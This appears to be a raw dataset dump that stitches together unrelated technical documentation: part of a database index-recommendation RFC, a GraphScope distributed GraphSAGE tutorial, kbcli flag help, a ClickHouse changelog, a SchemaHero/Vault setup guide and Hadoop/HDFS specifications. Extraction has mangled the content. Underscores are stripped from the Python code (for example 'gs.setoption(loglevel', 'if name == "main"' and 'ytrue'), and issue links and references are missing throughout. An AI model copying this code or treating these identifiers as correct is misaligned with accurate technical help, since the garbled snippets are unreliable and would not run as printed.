Deciding a fair cost to associate with creating an index and maintaining an index for database writes is a pending task. This is largely dependent on user preference, as some users might prioritize read performance over write performance, and vice versa. To handle this, we could have user settings that allow the user to indicate their preference, which will then affect the cost we use internally. These user settings should be specific to each \"application name\", to deal with the fact that some applications may be more latency-sensitive than others. Furthermore, creating and removing indexes has significant overhead, so we will use hypothetical indexes instead. There is an existing for this. However, these indexes persist to disk, and for our purposes, we only need the indexes in memory. We will need to additionally create fake tables that we can tamper with, without interfering with planning on concurrent queries. The implementation idea is to create a struct that wraps `optTable` with additional information pertaining to the table's hypothetical indexes. Our hypothetical indexes will be added and removed from this table, that is otherwise identical to the regular table. 
Moreover, when recommending the removal of indexes we must be cautious with `UNIQUE` indexes. If a unique index already exists, we have to ensure that we do not remove the unique constraint. This can easily be done by keeping unique indexes. For additional flexibility, however, we could consider adding a `UNIQUE WITHOUT INDEX` constraint, which would allow the unique index's removal. Running the costing algorithm so many times is another hurdle in terms of computational cost. We run the algorithm for each statement in W, for each statement's recommendation set, which is O(cardinality of W, squared) time. Since the queries we are concerned with are a subset of the statements in W, the time complexity is not a tight upper bound. However, it shows that this algorithm has roughly quadratic time complexity, which is quite slow. A way of mitigating this is by only allowing the recommendation algorithm to be run if database utilisation is below a certain threshold, similar to what Azure does . Another way of mitigating this is by ensuring the sample workload is a meaningful sample which is not too large. We do this by limiting the size of the sample workload when we fetch it. If performance continues to be an issue, which is highly applicable for auto-tuning, this functionality can be disabled. Alternatively, a setting can be configured to tune the database less frequently. When considering serverless' pricing based on RU consumption, this type of flexibility is vital. Finally, a general issue with this project would be recommending indexes that slow down overall performance. In theory, with proper design, this should not be a major issue. Albeit, there are cases in which this would happen. Since maintaining an index has an associated cost, it's not always beneficial to add more indexes. Thus, a certain middle ground must be" }, { "data": "It is possible that this middle ground is most optimal for the SQL statements considered when choosing recommendations, but in practice the workload's demands could fluctuate. Determining useful index recommendations in such a situation is a difficult task. Still, in most cases, one can expect the workload's general characteristics to be consistent. Also, index recommendations would only be made if there is enough sample data to do so. Meaning, index recommendations would always be based on patterns observed in a significant sample size. For the single-statement recommendations, another suggested interface was adding index recommendations to a separate `EXPLAIN` option, as opposed to adding it to a vanilla `EXPLAIN`. An advantage of this is it avoids cluttering the `EXPLAIN` output with unexpected information. However, this would add new syntax that could confuse users. It would also reduce the visibility of the feature, and since users who run `EXPLAIN` often want to see how the plan can be improved, having index recommendations in the same view would be helpful. Thus, it was decided that this would be included in the vanilla `EXPLAIN`. To determine the statement recommendation set, a simpler heuristic could easily be used. For example, the candidate set could be all single column indexes for attributes that appear in the query. The recommendation set would still be determined by running the optimizer with all indexes in the candidate set added. The reason this more involved method is chosen is that it considers more complex indexes that could potentially further improve performance. Another portion of the algorithm is the optimizer costing. 
A viable alternative to this, seen in modern literature, would be using ML-based modelling to choose indexes from statement recommendation sets. However, this seemed like overkill for our purposes. Although an impressive feat in academia, a simpler algorithm using our existing optimizer infrastructure can achieve largely the same goal. Thus, it made sense to use our optimizer costing algorithm. The impact of not doing this project at all is significant since established databases offer index recommendation. In not doing so, we are missing an important feature that some consumers expect. Will the engine recommend partial indexes, inverted indexes, or hash-sharded indexes? This algorithm will not consider these types of indexes to begin with as determining heuristics to recommend them is more difficult (notably partial and hash-sharded indexes). This could be an extension in the future. A known limitation with not recommending hash-sharded indexes is the potential creation of hotspot ranges, see this . How will we cost writes and index creation?. This is TBD. General ideas can be determined experimentally, as development of this feature is underway. One can create test data, SQL write statements and SQL queries in order to determine an index creation and update costing mechanism that makes sense. Could we recommend changes other than adding or removing indexes? Although this RFC deals with index recommendation specifically, there are other ways to tune the database to optimize performance. For example, in a multi-region database, we could recommend the conversion of regional tables to global tables (and vice versa). These types of additional recommendations can be explored in the future, in a separate RFC. [1] http://www.cs.toronto.edu/~alan/papers/icde00.pdf [2] https://baozhifeng.net/papers/cikm20-IndexRec.pdf" } ]
{ "category": "App Definition and Development", "file_name": "tutorial_node_classification_pyg_k8s.md", "project_name": "GraphScope", "subcategory": "Database" }
[ { "data": "This tutorial presents a server-client example that illustrates how GraphScope trains the GraphSAGE model (implemented in PyG) for a node classification task on a Kubernetes cluster. ```python import graphscope as gs from graphscope.dataset import loadogbnarxiv gs.setoption(loglevel=\"DEBUG\") gs.setoption(showlog=True) params = { \"NUMSERVERNODES\": 2, \"NUMCLIENTNODES\": 2, } sess = gs.session( with_dataset=True, k8sservicetype=\"NodePort\", k8svineyardmem=\"8Gi\", k8senginemem=\"8Gi\", vineyardsharedmem=\"8Gi\", k8simagepull_policy=\"IfNotPresent\", k8simagetag=\"0.26.0a20240115-x86_64\", numworkers=params[\"NUMSERVER_NODES\"], ) g = loadogbnarxiv(sess=sess, prefix=\"/dataset/ogbn_arxiv\") ``` ```python gltgraph = gs.graphlearntorch( g, edges=[ (\"paper\", \"citation\", \"paper\"), ], node_features={ \"paper\": [f\"feat_{i}\" for i in range(128)], }, node_labels={ \"paper\": \"label\", }, edge_dir=\"out\", randomnodesplit={ \"num_val\": 0.1, \"num_test\": 0.1, }, numclients=params[\"NUMCLIENT_NODES\"], manifest_path=\"./client.yaml\", clientfolderpath=\"./\", ) print(\"Exiting...\") ``` ```yaml apiVersion: \"kubeflow.org/v1\" kind: PyTorchJob metadata: name: graphlearn-torch-client namespace: default spec: pytorchReplicaSpecs: Master: replicas: 1 restartPolicy: OnFailure template: spec: containers: name: pytorch image: registry.cn-hongkong.aliyuncs.com/graphscope/graphlearn-torch-client:0.26.0a20240115-x86_64 imagePullPolicy: IfNotPresent command: bash -c |- python3 /workspace/client.py --noderank 0 --masteraddr ${MASTERADDR} --numservernodes ${NUMSERVERNODES} --numclientnodes ${NUMCLIENT_NODES} volumeMounts: mountPath: /dev/shm name: cache-volume mountPath: /workspace name: client-volume volumes: name: cache-volume emptyDir: medium: Memory sizeLimit: \"8G\" name: client-volume configMap: name: graphlearn-torch-client-config Worker: replicas: ${NUMWORKERREPLICAS} restartPolicy: OnFailure template: spec: containers: name: pytorch image: registry.cn-hongkong.aliyuncs.com/graphscope/graphlearn-torch-client:0.26.0a20240115-x86_64 imagePullPolicy: IfNotPresent command: bash -c |- python3 /workspace/client.py --noderank $((${MYPODNAME: -1}+1)) --masteraddr ${MASTERADDR} --groupmaster ${GROUPMASTER} --numservernodes ${NUMSERVERNODES} --numclientnodes ${NUMCLIENT_NODES} env: name: GROUP_MASTER value: graphlearn-torch-client-master-0 name: MYPODNAME valueFrom: fieldRef: fieldPath: metadata.name volumeMounts: mountPath: /dev/shm name: cache-volume mountPath: /workspace name: client-volume volumes: name: cache-volume emptyDir: medium: Memory sizeLimit: \"8G\" name: client-volume configMap: name: graphlearn-torch-client-config ``` ```python import argparse import time from typing import List import torch import torch.nn.functional as F from torch.distributed.algorithms.join import Join from torch.nn.parallel import DistributedDataParallel from torch_geometric.nn import GraphSAGE import graphscope as gs import graphscope.learning.graphlearn_torch as glt from graphscope.learning.gltorchgraph import GLTorchGraph from graphscope.learning.graphlearn_torch.typing import Split gs.setoption(loglevel=\"DEBUG\") gs.setoption(showlog=True) ``` ```python @torch.no_grad() def test(model, testloader, datasetname): model.eval() xs = [] y_true = [] for i, batch in enumerate(test_loader): if i == 0: device = batch.x.device batch.x = batch.x.to(torch.float32) # TODO x = model.module(batch.x, batch.edgeindex)[: batch.batchsize] xs.append(x.cpu()) ytrue.append(batch.y[: batch.batchsize].cpu()) del batch 
xs = [t.to(device) for t in xs] ytrue = [t.to(device) for t in ytrue] y_pred = torch.cat(xs, dim=0).argmax(dim=-1, keepdim=True) ytrue = torch.cat(ytrue, dim=0) testacc = sum((ypred.T == ytrue.T)[0]) / len(ytrue.T) return test_acc.item() ``` ```python def runclientproc( glt_graph, group_master: str, num_servers: int, num_clients: int, client_rank: int, serverranklist: List[int], dataset_name: str, epochs: int, batch_size: int, trainingpgmaster_port: int, ): print(\"-- Initializing client ...\") glt.distributed.init_client( numservers=numservers, numclients=numclients, clientrank=clientrank, masteraddr=gltgraph.master_addr, masterport=gltgraph.serverclientmaster_port, numrpcthreads=4, clientgroupname=\"k8sgltclient\", is_dynamic=True, ) currentctx = glt.distributed.getcontext() torch.distributed.initprocessgroup( backend=\"gloo\", rank=current_ctx.rank, worldsize=currentctx.world_size, initmethod=\"tcp://{}:{}\".format(groupmaster, trainingpgmaster_port), ) device = torch.device(\"cpu\") print(\"-- Creating training dataloader ...\") train_loader = glt.distributed.DistNeighborLoader( data=None, num_neighbors=[5, 3, 2], input_nodes=Split.train, batchsize=batchsize, shuffle=True, collect_features=True, to_device=device, worker_options=glt.distributed.RemoteDistSamplingWorkerOptions( serverrank=serverrank_list, num_workers=1," }, { "data": "worker_concurrency=1, buffer_size=\"256MB\", prefetch_size=1, gltgraph=gltgraph, workload_type=\"train\", ), ) print(\"-- Creating testing dataloader ...\") test_loader = glt.distributed.DistNeighborLoader( data=None, num_neighbors=[5, 3, 2], input_nodes=Split.test, batchsize=batchsize, shuffle=False, collect_features=True, to_device=device, worker_options=glt.distributed.RemoteDistSamplingWorkerOptions( serverrank=serverrank_list, num_workers=1, worker_devices=[torch.device(\"cpu\")], worker_concurrency=1, buffer_size=\"256MB\", prefetch_size=1, gltgraph=gltgraph, workload_type=\"test\", ), ) print(\"-- Initializing model and optimizer ...\") model = GraphSAGE( in_channels=128, hidden_channels=128, num_layers=3, out_channels=47, ).to(device) model = DistributedDataParallel(model, device_ids=None) optimizer = torch.optim.Adam(model.parameters(), lr=0.001) print(\"-- Start training and testing ...\") epochs = 10 dataset_name = \"ogbn-arxiv\" for epoch in range(0, epochs): model.train() start = time.time() with Join([model]): for batch in train_loader: optimizer.zero_grad() batch.x = batch.x.to(torch.float32) # TODO out = model(batch.x, batch.edgeindex)[: batch.batchsize].log_softmax( dim=-1 ) loss = F.nllloss(out, torch.flatten(batch.y[: batch.batchsize])) loss.backward() optimizer.step() end = time.time() print(f\"-- Epoch: {epoch:03d}, Loss: {loss:04f} Epoch Time: {end - start}\") torch.distributed.barrier() if epoch == 0 or epoch > (epochs // 2): testacc = test(model, testloader, dataset_name) print(f\"-- Test Accuracy: {test_acc:.4f}\") torch.distributed.barrier() print(\"-- Shutdowning ...\") glt.distributed.shutdown_client() print(\"-- Exited ...\") ``` ```python if name == \"main\": parser = argparse.ArgumentParser( description=\"Arguments for distributed training of supervised SAGE with servers.\" ) parser.add_argument( \"--dataset\", type=str, default=\"ogbn-arxiv\", help=\"The name of ogbn arxiv.\", ) parser.add_argument( \"--numservernodes\", type=int, default=2, help=\"Number of server nodes for remote sampling.\", ) parser.add_argument( \"--numclientnodes\", type=int, default=1, help=\"Number of client nodes for training.\", ) 
parser.add_argument( \"--node_rank\", type=int, default=0, help=\"The node rank of the current role.\", ) parser.add_argument( \"--epochs\", type=int, default=10, help=\"The number of training epochs. (client option)\", ) parser.add_argument( \"--batch_size\", type=int, default=256, help=\"Batch size for the training and testing dataloader.\", ) parser.add_argument( \"--trainingpgmaster_port\", type=int, default=9997, help=\"The port used for PyTorch's process group initialization across all training processes.\", ) parser.add_argument( \"--trainloadermaster_port\", type=int, default=9998, help=\"The port used for RPC initialization across all sampling workers of training loader.\", ) parser.add_argument( \"--testloadermaster_port\", type=int, default=9999, help=\"The port used for RPC initialization across all sampling workers of testing loader.\", ) parser.add_argument( \"--master_addr\", type=str, default=\"localhost\", help=\"The master address of the graphlearn server.\", ) parser.add_argument( \"--group_master\", type=str, default=\"localhost\", help=\"The master address of the training process group.\", ) args = parser.parse_args() print( f\" Distributed training example of supervised SAGE with server-client mode. Client {args.node_rank} \" ) print(f\"* dataset: {args.dataset}\") print(f\"* total server nodes: {args.numservernodes}\") print(f\"* total client nodes: {args.numclientnodes}\") print(f\"* node rank: {args.node_rank}\") numservers = args.numserver_nodes numclients = args.numclient_nodes print(f\"* epochs: {args.epochs}\") print(f\"* batch size: {args.batch_size}\") print(f\"* training process group master port: {args.trainingpgmaster_port}\") print(f\"* training loader master port: {args.trainloadermaster_port}\") print(f\"* testing loader master port: {args.testloadermaster_port}\") clientrank = args.noderank print(\" Loading graph info ...\") glt_graph = GLTorchGraph( [ args.master_addr + \":9001\", args.master_addr + \":9002\", args.master_addr + \":9003\", args.master_addr + \":9004\", ] ) print(\" Launching client processes ...\") runclientproc( glt_graph, args.group_master, num_servers, num_clients, client_rank, [serverrank for serverrank in range(num_servers)], args.dataset, args.epochs, args.batch_size, args.trainingpgmaster_port, ) ``` ```shell python3 k8s_launch.py ```" } ]
{ "category": "App Definition and Development", "file_name": "bytespart.md", "project_name": "Tremor", "subcategory": "Streaming & Messaging" }
[ { "data": "The part may take the following general form ```ebnf SimpleExprImut ':' 'int' '/' Ident ``` Where: The `SimpleExprImut can be a literal or identifier to the data being encoded. A optional size in bits, or defaulted based on the data being encoded. An optional encoding hint as an identifier The size must be zero or greater, up to and including but no larger than 64 bits. |Ident|Description| ||| |`binary`|Encoded in binary, using network ( big ) endian| |`big-unsigned-integer`|Unsigned integer encoding, big endian| |`little-unsigned-integer`|Unsigned integer encoding, little endian| |`big-signed-integer`|Signed integer encoding, big endian| |`little-signed-integer`|Signed integer encoding, little endian|" } ]
{ "category": "App Definition and Development", "file_name": "kbcli_kubeblocks_config.md", "project_name": "KubeBlocks by ApeCloud", "subcategory": "Database" }
[ { "data": "title: kbcli kubeblocks config KubeBlocks config. ``` kbcli kubeblocks config [flags] ``` ``` kbcli kubeblocks config --set snapshot-controller.enabled=true ``` ``` -h, --help help for config --set stringArray Set values on the command line (can specify multiple or separate values with commas: key1=val1,key2=val2) --set-file stringArray Set values from respective files specified via the command line (can specify multiple or separate values with commas: key1=path1,key2=path2) --set-json stringArray Set JSON values on the command line (can specify multiple or separate values with commas: key1=jsonval1,key2=jsonval2) --set-string stringArray Set STRING values on the command line (can specify multiple or separate values with commas: key1=val1,key2=val2) -f, --values strings Specify values in a YAML file or a URL (can specify multiple) ``` ``` --as string Username to impersonate for the operation. User could be a regular user or a service account in a namespace. --as-group stringArray Group to impersonate for the operation, this flag can be repeated to specify multiple groups. --as-uid string UID to impersonate for the operation. --cache-dir string Default cache directory (default \"$HOME/.kube/cache\") --certificate-authority string Path to a cert file for the certificate authority --client-certificate string Path to a client certificate file for TLS --client-key string Path to a client key file for TLS --cluster string The name of the kubeconfig cluster to use --context string The name of the kubeconfig context to use --disable-compression If true, opt-out of response compression for all requests to the server --insecure-skip-tls-verify If true, the server's certificate will not be checked for validity. This will make your HTTPS connections insecure --kubeconfig string Path to the kubeconfig file to use for CLI requests. --match-server-version Require server version to match client version -n, --namespace string If present, the namespace scope for this CLI request --request-timeout string The length of time to wait before giving up on a single server request. Non-zero values should contain a corresponding time unit (e.g. 1s, 2m, 3h). A value of zero means don't timeout requests. (default \"0\") -s, --server string The address and port of the Kubernetes API server --tls-server-name string Server name to use for server certificate validation. If it is not provided, the hostname used to contact the server is used --token string Bearer token for authentication to the API server --user string The name of the kubeconfig user to use ``` - KubeBlocks operation commands." } ]
{ "category": "App Definition and Development", "file_name": "citibank.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"CitiBank\" icon: /images/logos/powered-by/citibank.png hasLink: \"https://www.citi.com/\" <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. -->" } ]
{ "category": "App Definition and Development", "file_name": "2FA.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": "+++ title = \"2FA\" weight = 4 chapter = true +++ Two factor authentication (2FA) refers to the authentication method that combines both passport, and an object (credit card, SMS phone, token or biomarkers as fingerprint) to identify a user. To ensure the security of the committers account, we need you to enable 2FA to sign in and contribute codes on GitHub. More details, please refer to . To be noticed: If you do not enable 2FA, you will be removed from the project and unable to access our repositories and the fork from our private repository. For detailed operations, please refer to . After enabling 2FA, you need to sign in GitHub with the way of username/password + mobile phone authentication code. Tips: If you cannot download the APP through the page link, you can search and download Google Authenticator in APP Store. After enabling 2FA, you need to generate a private access Token to perform operations such as git submit and so on. At this time, you will use username + private access Token in replace of username + password to submit codes. For detailed operations, please refer to ." } ]
{ "category": "App Definition and Development", "file_name": "v20.11.7.16-stable.md", "project_name": "ClickHouse", "subcategory": "Database" }
[ { "data": "Backported in : Explicitly set uid / gid of clickhouse user & group to the fixed values (101) in clickhouse-server images. (). Backported in : Fix indeterministic functions with predicate optimizer. This fixes . (). Backported in : fix data type convert issue for mysql engine ... (). Backported in : Fix error when query `MODIFY COLUMN ... REMOVE TTL` doesn't actually remove column TTL. (). Backported in : Fix inserting a row with default value in case of parsing error in the last column. Fixes . (). Backported in : Fix possible incomplete query result while reading from `MergeTree` in case of read backoff (message `<Debug> MergeTreeReadPool: Will lower number of threads` in logs). Was introduced in . Fixes . (). Backported in : `SELECT JOIN` now requires the `SELECT` privilege on each of the joined tables. This PR fixes . (). Backported in : Fix possible crashes in aggregate functions with combinator `Distinct`, while using two-level aggregation. Fixes . (). Backported in : Fix index analysis of binary functions with constant argument which leads to wrong query results. This fixes . (). Backported in : Fix filling table `system.settingsprofileelements`. This PR fixes . (). Backported in : Restrict merges from wide to compact parts. In case of vertical merge it led to broken result part. (). Backported in : Fixed `value is too short` error when executing `toType(...)` functions (`toDate`, `toUInt32`, etc) with argument of type `Nullable(String)`. Now such functions return `NULL` on parsing errors instead of throwing exception. Fixes . (). Backported in : Disable constant folding for subqueries on the analysis stage, when the result cannot be calculated. (). Backported in : Proper support for 12AM in `parseDateTimeBestEffort` function. This fixes . (). Backported in : Disable write with AIO during merges because it can lead to extremely rare data corruption of primary key columns during merge. (). Backported in : Fix bug which may lead to `ALTER` queries hung after corresponding mutation kill. Found by thread fuzzer. (). Backported in : Fix possible `Pipeline stuck` error while using `ORDER BY` after subquery with `RIGHT` or `FULL` join. (). Backported in : Add FixedString Data type support. I'll get this exception \"Code: 50, e.displayText() = DB::Exception: Unsupported type FixedString(1)\" when replicating data from MySQL to ClickHouse. This patch fixes bug Also fixes . (). Backported in : Fix Logger with unmatched arg size. (). Backported in : Fixed `Attempt to read after eof` error when trying to `CAST` `NULL` from `Nullable(String)` to `Nullable(Decimal(P, S))`. Now function `CAST` returns `NULL` when it cannot parse decimal from nullable string. Fixes . (). Backported in : Asynchronous distributed INSERTs can be rejected by the server if the setting `networkcompressionmethod` is globally set to non-default value. This fixes . (). Backported in : Fix If combinator with unary function and Nullable types. (). Backported in : Fix possible hang at shutdown in clickhouse-local. This fixes . (). Backported in : Attach partition should reset the mutation. . (). Backported in : Fix bug when mutation with some escaped text (like `ALTER" }, { "data": "UPDATE e = CAST('foo', 'Enum8(\\'foo\\' = 1')` serialized incorrectly. Fixes . (). Backported in : Fixed very rare deadlock at shutdown. (). Backported in : Disable `optimizemovefunctionsoutof_any` because optimization is not always correct. This closes . This closes . (). 
Backported in : Fix inserting of `LowCardinality` column to table with `TinyLog` engine. Fixes . (). Backported in : Fix possible error `Expected single dictionary argument for function` if use function `ignore` with `LowCardinality` argument. Fixes . (). Backported in : Make sure `groupUniqArray` returns correct type for argument of Enum type. This closes . (). Backported in : Restrict `MODIFY TTL` queries for `MergeTree` tables created in old syntax. Previously the query succeeded, but actually it had no effect. (). Backported in : Fixed `There is no checkpoint` error when inserting data through http interface using `Template` or `CustomSeparated` format. Fixes . (). Backported in : Fix startup bug when clickhouse was not able to read compression codec from `LowCardinality(Nullable(...))` and throws exception `Attempt to read after EOF`. Fixes . (). Backported in : Fix infinite reading from file in `ORC` format (was introduced in ). Fixes . (). Backported in : Fix bug when concurrent `ALTER` and `DROP` queries may hang while processing ReplicatedMergeTree table. (). Backported in : Fix error `Cannot convert column now64() because it is constant but values of constants are different in source and result`. Continuation of . (). Backported in : Fix system.parts state column (LOGICALERROR when querying this column, due to incorrect order). (). Backported in : - Fix default value in join types with non-zero default (e.g. some Enums). Closes . (). Backported in : Fix possible buffer overflow in Uber H3 library. See https://github.com/uber/h3/issues/392. This closes . (). Backported in : Fixed very rare bug that might cause mutation to hang after `DROP/DETACH/REPLACE/MOVE PARTITION`. It was partially fixed by for the most cases. (). Backported in : Mark distributed batch as broken in case of empty data block in one of files. (). Backported in : Buffer overflow (on memory read) was possible if `addMonth` function was called with specifically crafted arguments. This fixes . This fixes . (). Backported in : Fix SIGSEGV with mergetreeminrowsforconcurrentread/mergetreeminbytesforconcurrentread=0/UINT64_MAX. (). Backported in : Query CREATE DICTIONARY id expression fix. (). Backported in : `DROP/DETACH TABLE table ON CLUSTER cluster SYNC` query might hang, it's fixed. Fixes . (). Backported in : Fix use-after-free of the CompressedWriteBuffer in Connection after disconnect. (). Backported in : Fix wrong result of function `neighbor` for `LowCardinality` argument. Fixes . (). Backported in : Some functions with big integers may cause segfault. Big integers is experimental feature. This closes . (). Backported in : Fix a segmentation fault in `bitmapAndnot` function. Fixes . (). Backported in : Fixed stack overflow when using accurate comparison of arithmetic type with string type. (). Backported in : In previous versions, unusual arguments for function arrayEnumerateUniq may cause crash or infinite loop. This closes . (). Backported in : Deadlock was possible if system.text_log is enabled. This fixes . (). Backported in : BloomFilter index crash fix. Fixes . (). Backported in : Update timezones info to 2020e. ()." } ]
{ "category": "App Definition and Development", "file_name": "README.md", "project_name": "SchemaHero", "subcategory": "Database" }
[ { "data": "The files in this directory are an example of using SchemaHero to manage a PostgreSQL database using credentials managed by HashiCorp Vault. Deploy a PostgreSQL and Vault instance to a new namespace. The following manifests were taken from the PostgreSQL and Vault Helm Charts. The vault chart is in dev mode and should be used for this tutorial only -- do not use for production. ``` kubectl create ns schemahero-vault kubectl apply -f ./postgresql/postgresql-11.8.0.yaml kubectl apply -f ./vault/vault.yaml ``` Next, enable the database secret engine: ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault secrets enable database ``` Now, we need to create a Vault role and config: ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault write database/roles/schemahero \\ db_name=airlinedb \\ creation_statements=\"CREATE ROLE \\\"{{name}}\\\" WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}'; \\ GRANT SELECT ON ALL TABLES IN SCHEMA public TO \\\"{{name}}\\\";\" \\ revocation_statements=\"ALTER ROLE \\\"{{name}}\\\" NOLOGIN;\"\\ default_ttl=\"1h\" \\ max_ttl=\"24h\" ``` ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault write database/config/airlinedb \\ plugin_name=postgresql-database-plugin \\ allowed_roles=\"*\" \\ connection_url=\"postgresql://{{username}}:{{password}}@postgresql:5432/airlinedb?sslmode=disable\" \\ username=\"postgres\" \\ password=\"password\" ``` The following command will request a new username and password for our database. This is just confirming that Vault it working and has permissions. ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault read database/creds/schemahero ``` ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault auth enable kubernetes ``` FROM YOUR COMPUTER (not in the vault pod): ``` kubectl -n schemahero-vault exec $(kubectl -n schemahero-vault get pods --selector \"app.kubernetes.io/instance=vault,component=server\" -o jsonpath=\"{.items[0].metadata.name}\") -c vault -- \\ sh -c ' \\ VAULT_TOKEN=root vault write auth/kubernetes/config \\ tokenreviewerjwt=\"$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\" \\ kuberneteshost=https://${KUBERNETESPORT443TCP_ADDR}:443 \\ kubernetescacert=@/var/run/secrets/kubernetes.io/serviceaccount/ca.crt' ``` Create the policy ``` tee -a /tmp/policy.hcl > /dev/null <<EOT path \"database/creds/schemahero\" { capabilities = [\"read\"] } path \"database/config/airlinedb\" { capabilities = [\"read\"] } EOT ``` ``` kubectl -n schemahero-vault cp /tmp/policy.hcl vault-0:/tmp/policy.hcl ``` ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault policy write schemahero /tmp/policy.hcl ``` ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault write auth/kubernetes/role/schemahero \\ boundserviceaccount_names=schemahero \\ boundserviceaccount_namespaces=schemahero-vault \\ policies=schemahero \\ ttl=1h ``` Deploy the serviceaccount: ``` kubectl apply -f ./vault/sa.yaml ```" } ]
{ "category": "App Definition and Development", "file_name": "abortable.md", "project_name": "Apache Hadoop", "subcategory": "Database" }
[ { "data": "<! Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. See accompanying LICENSE file. --> <!-- ============================================================= --> <!-- CLASS: FileSystem --> <!-- ============================================================= --> <!-- MACRO{toc|fromDepth=1|toDepth=2} --> Abort the active operation such that the output does not become manifest. Specifically, if supported on an , a successful `abort()` MUST guarantee that the stream will not be made visible in the `close()` operation. ```java @InterfaceAudience.Public @InterfaceStability.Unstable public interface Abortable { / Abort the active operation without the output becoming visible. * This is to provide ability to cancel the write on stream; once a stream is aborted, the write MUST NOT become visible. * @throws UnsupportedOperationException if the operation is not supported. @return the result. */ AbortableResult abort(); / Interface for the result of aborts; allows subclasses to extend (IOStatistics etc) or for future enhancements if ever needed. */ interface AbortableResult { / Was the stream already closed/aborted? @return true if a close/abort operation had already taken place. */ boolean alreadyClosed(); / Any exception caught during cleanup operations, exceptions whose raising/catching does not change the semantics of the abort. @return an exception or null. */ IOException anyCleanupException(); } } ``` Aborts the ongoing operation such that no output SHALL become visible when the operation is completed. Unless and until other File System classes implement `Abortable`, the interface is specified purely for output streams. `Abortable.abort()` MUST only be supported on output streams whose output is only made visible when `close()` is called, for example. output streams returned by the S3A FileSystem. The stream MUST implement `Abortable` and `StreamCapabilities`. ```python if unsupported: throw UnsupportedException if not isOpen(stream): no-op" }, { "data": "== True ``` After `abort()` returns, the filesystem MUST be unchanged: ``` FS' = FS ``` A successful `abort()` operation MUST guarantee that when the stream` close()` is invoked no output shall be manifest. The stream MUST retry any remote calls needed to force the abort outcome. If any file was present at the destination path, it MUST remain unchanged. Strictly then: if `Abortable.abort()` does not raise `UnsupportedOperationException` then returns, then it guarantees that the write SHALL NOT become visible and that any existing data in the filesystem at the destination path SHALL continue to be available. Calls to `write()` methods MUST fail. Calls to `flush()` MUST be no-ops (applications sometimes call this on closed streams) Subsequent calls to `abort()` MUST be no-ops. `close()` MUST NOT manifest the file, and MUST NOT raise an exception That is, the postconditions of `close()` becomes: ``` FS' = FS ``` If temporary data is stored in the local filesystem or in the store's upload infrastructure then this MAY be cleaned up; best-effort is expected here. 
The stream SHOULD NOT retry cleanup operations; any failure there MUST be caught and added to `AbortResult` The `AbortResult` value returned is primarily for testing and logging. `alreadyClosed()`: MUST return `true` if the write had already been aborted or closed; `anyCleanupException();`: SHOULD return any IOException raised during any optional cleanup operations. Output streams themselves aren't formally required to be thread safe, but as applications do sometimes assume they are, this call MUST be thread safe. An application MUST be able to verify that a stream supports the `Abortable.abort()` operation without actually calling it. This is done through the `StreamCapabilities` interface. If a stream instance supports `Abortable` then it MUST return `true` in the probe `hasCapability(\"fs.capability.outputstream.abortable\")` If a stream instance does not support `Abortable` then it MUST return `false` in the probe `hasCapability(\"fs.capability.outputstream.abortable\")` That is: if a stream declares its support for the feature, a call to `abort()` SHALL meet the defined semantics of the operation. FileSystem/FileContext implementations SHOULD declare support similarly, to allow for applications to probe for the feature in the destination directory/path. If a filesystem supports `Abortable` under a path `P` then it SHOULD return `true` to `PathCababilities.hasPathCapability(path, \"fs.capability.outputstream.abortable\")` This is to allow applications to verify that the store supports the feature. If a filesystem does not support `Abortable` under a path `P` then it MUST return `false` to `PathCababilities.hasPathCapability(path, \"fs.capability.outputstream.abortable\")`" } ]
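A sketch of how a caller might combine the capability probe with `abort()` — the path is a placeholder, and on older Hadoop releases the abort call may need to go through the wrapped stream rather than `FSDataOutputStream` directly:

```java
import java.io.IOException;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;

public class AbortableWriteSketch {
  // Write bytes; if the write fails and the stream is abortable, abort it so
  // that no partial output ever becomes visible at the destination path.
  static void writeOrAbort(FileSystem fs, Path path, byte[] data) throws IOException {
    FSDataOutputStream out = fs.create(path);
    try {
      out.write(data);
    } catch (IOException e) {
      if (out.hasCapability("fs.capability.outputstream.abortable")) {
        out.abort(); // close() below will no longer manifest the file
      }
      throw e;
    } finally {
      out.close();
    }
  }
}
```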
{ "category": "App Definition and Development", "file_name": "TransparentEncryption.md", "project_name": "Apache Hadoop", "subcategory": "Database" }
[ { "data": "<! Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. See accompanying LICENSE file. --> Transparent Encryption in HDFS ============================== <!-- MACRO{toc|fromDepth=0|toDepth=2} --> Overview -- HDFS implements transparent, end-to-end encryption. Once configured, data read from and written to special HDFS directories is transparently encrypted and decrypted without requiring changes to user application code. This encryption is also end-to-end, which means the data can only be encrypted and decrypted by the client. HDFS never stores or has access to unencrypted data or unencrypted data encryption keys. This satisfies two typical requirements for encryption: at-rest encryption (meaning data on persistent media, such as a disk) as well as in-transit encryption 